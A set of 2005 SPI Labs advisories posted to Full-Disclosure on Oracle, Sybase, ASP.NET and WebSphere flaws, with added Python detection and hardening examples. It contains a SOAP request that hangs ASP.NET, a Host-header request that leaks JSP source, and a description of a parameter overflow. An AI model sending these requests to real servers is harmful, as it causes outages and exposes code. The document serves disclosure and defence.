[Full-disclosure] Oracle 10g - emagent.exe Stack-Based Overflow

2005-10-20 Thread SPI Labs
Oracle 10g - emagent.exe Stack-Based Overflow
http://www.spidynamics.com/spilabs/advisories/oracle-emagentoverflow.html

Release Date: October 18, 2005
Severity: Critical

Systems Affected

For a complete list of products and components affected, please visit
http://www.oracle.com/technology/deploy/security/pdf/cpuoct2005.html

Description
---
A vulnerability has been discovered in Oracle Application Server 10g
(10.1.2) on Windows 2000 Server and others (see list above). If exploited,
this can result in user-specified code being executed under the security
context of the Oracleoracleas1ASControl service - NT Authority\SYSTEM by
default.


Remediation
---
The issue can be resolved by applying the patches provided in the October
2005 Oracle Critical Patch Update, available from
http://www.oracle.com/technology/deploy/security/pdf/cpuoct2005.html.


Vendor Information
---
Oracle was contacted on March 7, 2005. For more information about this
advisory, please visit the Oracle Critical Patch Update page:
http://www.oracle.com/technology/deploy/security/pdf/cpuoct2005.html.


Contact Information
[EMAIL PROTECTED]
SPI Dynamics, Inc.
115 Perimeter Center Place N.E.
suite 1100
Atlanta, GA. 30346
Toll-Free Phone: (866) 774-2700



SPI Dynamics was founded in 2000 by a team of accomplished Web security
specialists; SPI Dynamics is the leader in Web application security
technology. With such signature products as WebInspect, SPI Dynamics is
dedicated to protecting companies' most valuable assets. SPI Dynamics
has created a new breed of Internet security products for the Web
application, the most vulnerable yet least secure component of online
business infrastructure.

Copyright (c) 2005 SPI Dynamics, Inc. All rights reserved worldwide.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Stack-Based Buffer Overflow in Sybase EAServer 4.2.5 to 5.2

2005-07-16 Thread SPI Labs
Stack-Based Buffer Overflow in Sybase EAServer 4.2.5 to 5.2
---

Release Date: July 15 2005
Severity: Medium

A vulnerability has been discovered in Sybase EAServer. If exploited, this
can result in user-specified code being executed under the security context
of the jagsrv.exe process. To complete this attack, you must be
authenticated to /WebConsole/. By default, the jagadmin user password is
set to blank, so getting access might be trivial.

After authenticating to /WebConsole/, if an attacker sets the value of the
JavaScript parameter in TreeAction.do to a large value, a return address can
be overwritten due to a stack-based buffer overflow.

For more information about this advisory, please visit our advisory page at
http://www.spidynamics.com/spilabs/advisories/sybaseEAserverOverflow.htm

[Remediation]
For a complete list of versions affected and the patches required, please
visit the complete advisory page:
http://www.spidynamics.com/spilabs/advisories/sybaseEAserverOverflow.htm


Vendor Information:
Sybase was contacted on 05/05/2005. For more information about this
advisory, please visit the Sybase alert page:
http://www.sybase.com/detail?id=1036742


Contact Information
[EMAIL PROTECTED]
SPI Dynamics, Inc.
115 Perimeter Center Place N.E.
suite 1100
Atlanta, GA. 30346
Toll-Free Phone: (866) 774-2700




Copyright (c) 2005 SPI Dynamics, Inc. All rights reserved worldwide.

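A log-side detection for the condition described in the Sybase advisory above, as an added example that is not part of the advisory or of Sybase's software: it scans constructed access-log lines for requests to /WebConsole/TreeAction.do whose JavaScript parameter exceeds a length bound. The 256-byte threshold, the common-log layout of the sample lines and the restriction to query-string parameters are assumptions; the advisory does not state the length needed to reach the return address.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines in common-log shape; the second one carries a
# 3000-byte JavaScript parameter. None of these come from a real server.
SAMPLE_LOG = [
    '10.0.0.5 - jagadmin [15/Jul/2005:10:01:02 +0000] '
    '"GET /WebConsole/TreeAction.do?JavaScript=true HTTP/1.1" 200 512',
    '10.0.0.9 - jagadmin [15/Jul/2005:10:02:17 +0000] '
    '"GET /WebConsole/TreeAction.do?JavaScript=' + 'A' * 3000 + ' HTTP/1.1" 500 0',
    '10.0.0.5 - - [15/Jul/2005:10:03:00 +0000] '
    '"GET /WebConsole/index.jsp HTTP/1.1" 200 2048',
]

# Assumed bound: any single query parameter sent to the WebConsole longer
# than this is treated as suspicious. The advisory gives no exact length.
MAX_PARAM_LEN = 256
WATCHED_PREFIX = "/WebConsole/"

# Pulls the quoted request line out of a common-log entry
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def oversized_params(line, limit=MAX_PARAM_LEN):
    """Return [(path, name, length)] for WebConsole query parameters over limit."""
    m = REQUEST_RE.search(line)
    if m is None:
        return []
    parts = urlsplit(m.group("target"))
    if not parts.path.startswith(WATCHED_PREFIX):
        return []
    hits = []
    # keep_blank_values so an empty parameter still appears (length 0)
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            if len(value) > limit:
                hits.append((parts.path, name, len(value)))
    return hits


def scan_log(lines, limit=MAX_PARAM_LEN):
    """Indices of log lines that carry at least one oversized parameter."""
    return [i for i, line in enumerate(lines) if oversized_params(line, limit)]


if __name__ == "__main__":
    for i in scan_log(SAMPLE_LOG):
        print(i, oversized_params(SAMPLE_LOG[i]))
```

Only the query string is inspected here; a TreeAction.do parameter sent in a POST body is not visible in a standard access log, so the same length check would have to run in a request filter in front of the console. The 500 status on the flagged line is constructed; a crashed jagsrv.exe may produce no log entry at all.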


[Full-disclosure] ASP.NET RPC/Encoded Web service DoS

2005-07-11 Thread SPI Labs
ASP.NET RPC/Encoded Web service DoS
http://www.spidynamics.com/spilabs/advisories/aspRCP.html

Release Date: July 11, 2005
Severity: High

[System Affected]
* IIS servers exposing ASP.NET Web services that consume arrays in
  RPC/Encoded mode
* Applications using System.Xml.Serialization to consume untrusted data
  in RPC/Encoded mode

[Description]
We have found that by sending a custom SOAP message to an RPC/Encoded
web method which accepts an array (or any object derived from IList,
like StringCollection or ArrayList), we can cause the aspnet_wp.exe
process to consume 100% of the system resources. More than one request
may be required to create this condition on faster systems.

To replicate the issue, we can send a request to the Test(int[] someList)
web method defined inside the AspCrashWebService project (refer to
AspCrashWebService.zip distributed with this document). A normal SOAP
message to call this method with a single element of 0 would look like:

<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
  xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
  xmlns:tns="http://tempuri.org/"
  xmlns:types="http://tempuri.org/encodedTypes"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <tns:Test>
      <someList href="#id1" />
    </tns:Test>
    <soapenc:Array id="id1" soapenc:arrayType="xsd:int[1]">
      <Item>0</Item>
    </soapenc:Array>
  </soap:Body>
</soap:Envelope>

If we replace the soapenc:Array definition with the complex type defined
in our demo ASPCrashWebService.Service1 WSDL definition (ArrayOfInt), we
will cause the problem in aspnet_wp.exe. Our new request would look like:

<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
  xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
  xmlns:tns="http://tempuri.org/"
  xmlns:types="http://tempuri.org/encodedTypes"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <tns:Test>
      <someList href="#id1" />
    </tns:Test>
    <tns:ArrayOfInt>
      <Item>0</Item>
    </tns:ArrayOfInt>
  </soap:Body>
</soap:Envelope>

We have found that the error is caused by an infinite loop inside
System.Xml.Serialization.Xml.XmlSerializationReader.ReadReferencedElements().
The method can be translated to the following code:

protected void ReadReferencedElements()
{
    string V_0;

    r.MoveToContent();
    // Loop until the enclosing element ends or the reader runs out of input
    while (r.NodeType != XmlNodeType.EndElement && r.NodeType != XmlNodeType.None)
    {
        // Reads one multi-reference element. Nothing checks that a node was
        // actually consumed, so an element the reader does not recognise
        // leaves r.NodeType at XmlNodeType.Element and the loop never exits.
        ReadReferencingElement(null, null, true, out V_0);
        r.MoveToContent();
    }
    DoFixups();
    HandleUnreferencedObjects();
}

The problem is that after the call to ReadReferencingElement() the
r.NodeType is still set to XmlNodeType.Element, so the while loop never
terminates.

[Remediation]
RPC/Encoded web services are not recommended by Microsoft. Developers
should utilize document/literal instead, which is not affected by this
issue. The Microsoft Security Response Center has stated that this issue
will be addressed in the upcoming Whidbey release of Web Services. In
the interim, the aspnet_wp.exe service can be restarted and operation
will resume without problems.

[Credit]
Discovery: Bryan Sullivan
Research: Sacha Faust

Contact Information
[EMAIL PROTECTED]
SPI Dynamics, Inc.
115 Perimeter Center Place N.E.
suite 1100
Atlanta, GA. 30346
Toll-Free Phone: (866) 774-2700




Copyright (c) 2005 SPI Dynamics, Inc. All rights reserved worldwide.
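A runnable model of the ReadReferencedElements() loop from the ASP.NET advisory above, as an added example that is neither SPI Dynamics' nor Microsoft's code. It walks the SOAP Body children with Python's xml.etree the way the .NET reader walks nodes: the callee only consumes a soapenc:Array that carries an id, so on the second request the cursor never advances and the original loop shape spins (bounded here by an iteration cap so it can run). The guarded variant shows the fix a deserializer needs: every pass of a read loop must make progress or the input is rejected. The Cursor class, the function names and the two constructed messages are assumptions of this example.

```python
"""Model of the advisory's ReadReferencedElements() loop and a guarded version."""
import xml.etree.ElementTree as ET

SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"
SOAP_ENC = "http://schemas.xmlsoap.org/soap/encoding/"

# Constructed messages mirroring the two requests in the advisory.
BENIGN = f"""<soap:Envelope xmlns:soap="{SOAP_ENV}" xmlns:soapenc="{SOAP_ENC}"
    xmlns:tns="http://tempuri.org/" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <soap:Body>
    <tns:Test><someList href="#id1"/></tns:Test>
    <soapenc:Array id="id1" soapenc:arrayType="xsd:int[1]"><Item>0</Item></soapenc:Array>
  </soap:Body>
</soap:Envelope>"""

# Same call, but the multi-ref element is the WSDL complex type instead of
# a soapenc:Array, exactly the substitution the advisory describes.
MALICIOUS = BENIGN.replace(
    '<soapenc:Array id="id1" soapenc:arrayType="xsd:int[1]"><Item>0</Item></soapenc:Array>',
    '<tns:ArrayOfInt><Item>0</Item></tns:ArrayOfInt>')


class Cursor:
    """Stands in for the XmlReader r: a position over the Body's child elements."""
    def __init__(self, body):
        self.elems = list(body)
        self.pos = 0

    def node_type(self):
        return "Element" if self.pos < len(self.elems) else "EndElement"

    def current(self):
        return self.elems[self.pos]


def read_referencing_element(cur, refs):
    """Consume one multi-reference element. Only a soapenc:Array carrying an
    id is understood; anything else is left unconsumed, which is the root of
    the hang in the original loop."""
    el = cur.current()
    if el.tag == f"{{{SOAP_ENC}}}Array" and "id" in el.attrib:
        refs[el.attrib["id"]] = [int(item.text) for item in el]
        cur.pos += 1


def read_referenced_elements(cur, refs, max_iterations=10_000):
    """Shape of the vulnerable loop; the iteration cap only exists so the
    model terminates and can report that it would have hung."""
    iterations = 0
    while cur.node_type() != "EndElement":
        read_referencing_element(cur, refs)
        iterations += 1
        if iterations > max_iterations:
            return "hung"
    return "done"


def read_referenced_elements_guarded(cur, refs):
    """Hardened loop: a pass that does not advance the cursor means the
    reader did not understand the element, so the message is rejected."""
    while cur.node_type() != "EndElement":
        before = cur.pos
        read_referencing_element(cur, refs)
        if cur.pos == before:
            raise ValueError(f"unexpected element {cur.current().tag}: no progress")
    return "done"


def deserialize(xml_text, loop):
    """Parse the envelope, skip the method element, then run the given loop.
    Returns (status, resolved multi-ref objects by id)."""
    body = ET.fromstring(xml_text).find(f"{{{SOAP_ENV}}}Body")
    cur = Cursor(body)
    cur.pos = 1  # <tns:Test> has already been read by the method dispatcher
    refs = {}
    return loop(cur, refs), refs


if __name__ == "__main__":
    print(deserialize(BENIGN, read_referenced_elements))
    print(deserialize(MALICIOUS, read_referenced_elements))
```

The same progress check is the generic defence for any pull-parser loop of the form "while not at end: read one thing"; the loop condition alone cannot tell a consumed node from one the callee declined to touch.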


[Full-disclosure] IBM WebSphere Widespread configuration JSP disclosure

2005-04-13 Thread SPI Labs
IBM WebSphere Widespread configuration JSP disclosure

Release Date:   04/13/2005
Severity:   High

[Systems Affected]
*   IBM WebSphere Application 6 and prior.

[Description]

The practice of sharing the document root of the app server within the
document root of the web server creates a security exposure that can result
in the JSP source being served up as plain text by the web server. The
plug-in has a set of rules used to determine whether a given request will be
handled by the app server. When an incoming request fails to match those
rules, the plug-in returns control to the web server so that the web server
can fulfill the request. In this case, the unknown Host header causes the
plug-in to return control to the web server because the rules don't indicate
the app server should handle it. Therefore, the web server looks for the
request in the web server document root. Since the JSP source is stored in
the document root of the web server, the web server finds the file and
serves it as plain text. The following is a demonstration of how to
replicate the issue.

HTTP request sent
-

GET /index.jsp  HTTP/1.0
Host: NonExistentHost


HTTP response received
--

HTTP/1.1 200 OK
Via: HTTP/1.1 websphereserver (IBM-PROXY)
Date: Wed, 09 Mar 2005 21:39:43 GMT
Server: IBM_HTTP_Server/1.3.12.6 Apache/1.3.12 (Unix)
Last-Modified: Tue, 01 Mar 2005 18:35:02 GMT
ETag: 515e0007-1d72-4224b5d6
Accept-Ranges: bytes
Content-Length: 7538
Content-Type: text/plain

<%@ include file="/main/inc/alt-header-0.inc" %>
<%@ include file="includes/tabincv4.jsp" %>
<%@ include file="includes/tactic.jsp" %>
<%=headerjs%>
<jsp:include page="<%=tabhdrinc %>" flush="true"/>


[Remediation]

To eliminate this exposure, you should move the app server JSP source
outside of the web server document root. Then, when this request comes in
with the unknown Host header, the plug-in will return control to the web
server and the web server will fail to find the file in the document root.
Therefore, the web server will return 404 File Not Found rather than the
JSP source.

[Vendor Information]
The vendor was contacted repeatedly without any conclusive results.



Contact Information
[EMAIL PROTECTED]
SPI Dynamics, Inc.
115 Perimeter Center Place N.E.
suite 1100
Atlanta, GA. 30346
Toll-Free Phone: (866) 774-2700




Copyright (c) 2005 SPI Dynamics, Inc. All rights reserved worldwide.
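Two defender-side checks for the WebSphere exposure described in the advisory above, as an added example that is neither IBM's nor SPI Dynamics' code. The first classifies an HTTP response to a .jsp path as leaked source when it comes back with a 200 status, a non-HTML content type and JSP directives in the body, the pattern shown in the advisory's captured response. The second implements the remediation as a configuration check: it reports whether the app server's JSP directory sits under the web server document root. The response text is constructed to match the advisory's capture, and the directory paths are placeholders, not real WebSphere or IBM HTTP Server locations.

```python
from pathlib import PurePosixPath

# Constructed response modelled on the advisory's capture (not taken from a
# real server): a .jsp request answered by the web server as text/plain.
LEAKED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: IBM_HTTP_Server/1.3.12.6 Apache/1.3.12 (Unix)\r\n"
    "Content-Type: text/plain\r\n"
    "\r\n"
    '<%@ include file="/main/inc/alt-header-0.inc" %>\r\n'
    "<%=headerjs%>\r\n"
)

# Constructed: the same path handled by the app server, rendered to HTML
RENDERED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=ISO-8859-1\r\n"
    "\r\n"
    "<html><body>Welcome</body></html>\r\n"
)


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status code, headers dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def jsp_source_leaked(request_path, raw_response):
    """True when a .jsp path came back as raw source instead of rendered output:
    a 200 answer whose content type is not HTML and whose body holds JSP tags."""
    if not request_path.lower().endswith(".jsp"):
        return False
    status, headers, body = parse_response(raw_response)
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    return status == 200 and ctype != "text/html" and "<%" in body


def jsp_dir_inside_docroot(document_root, jsp_dir):
    """True when the app server's JSP directory lies under the web server
    document root, the layout the advisory says exposes the source."""
    root = PurePosixPath(document_root)
    target = PurePosixPath(jsp_dir)
    return root == target or root in target.parents


if __name__ == "__main__":
    print(jsp_source_leaked("/index.jsp", LEAKED_RESPONSE))
    print(jsp_dir_inside_docroot("/placeholder/htdocs", "/placeholder/htdocs/app"))
```

The response check is the signature a scanner or proxy can apply to its own traffic: it does not need the plug-in's rules, only the observation that a JSP path was answered by something that never compiled it. The path check belongs in a build or deployment review, run against the DocumentRoot and the application install directory after the move the remediation describes.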